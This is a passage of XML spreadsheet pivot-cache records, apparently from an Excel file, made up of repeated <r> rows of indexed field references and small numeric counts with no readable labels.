    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1305"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="13"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="22"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="88"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="392"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1307"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1308"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="48"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1309"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="11"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="31"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="38"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="43"/>
    <x v="1310"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1311"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1312"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1313"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1314"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1315"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1316"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1317"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1318"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="11"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="53"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="56"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1319"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1320"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="7"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="16"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1321"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="5"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1322"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1323"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1324"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1325"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1326"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1326"/>
  </r>
  <r>
